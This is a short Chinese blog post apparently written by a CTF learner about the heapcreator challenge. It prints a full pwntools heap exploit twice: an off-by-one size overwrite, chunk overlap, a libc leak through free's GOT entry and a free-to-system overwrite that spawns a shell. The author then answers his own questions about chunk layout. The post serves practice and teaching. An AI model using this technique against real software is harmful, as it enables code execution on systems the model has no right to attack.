hitcontraining_heapcreator 一点小疑惑

exp:

from pwn import *
from LibcSearcher import LibcSearcher
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')

def create(length,value):
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)
def edit(index,value):
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)
def show(index):
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
def delete(index):
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))

create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

edit(0,'a'*0x18+'\x81')
delete(1)

size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)
gdb.attach(sh)
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

edit(2,p64(system_addr))
delete(3)
sh.interactive()
from pwn import *
from LibcSearcher import LibcSearcher
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')

def create(length,value):
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)
def edit(index,value):
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)
def show(index):
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
def delete(index):
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))

create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

edit(0,'a'*0x18+'\x81')
delete(1)

size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)
gdb.attach(sh)
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

edit(2,p64(system_addr))
delete(3)
sh.interactive()

1.为什么要将chunk1释放后再进行malloc,然后填入数据。而不是直接填入数据?

假如直接填入数据的话,改变一下exp

然后查看堆发现

chunk1的size没有变,所以最多还是只能输入0x10大小的数据,所以我们要先free掉,然后再malloc(0x70),让chunk的size变成0x70,然后填充数据

2.如图

 

 为什么填入的数据会从0x1616050开始?

因为每次add都会创立两个chunk,第一个chunk就是0x1616070处,在后面将会被覆盖,所以我会有这个疑问。第二个chunk,也就是填入数据的chunk,就在0x1616040,0x1616048是size,0x1616050是数据存储的地方。

 

posted @ 2021-09-28 18:04  ATKevin  阅读(68)  评论(0编辑  收藏  举报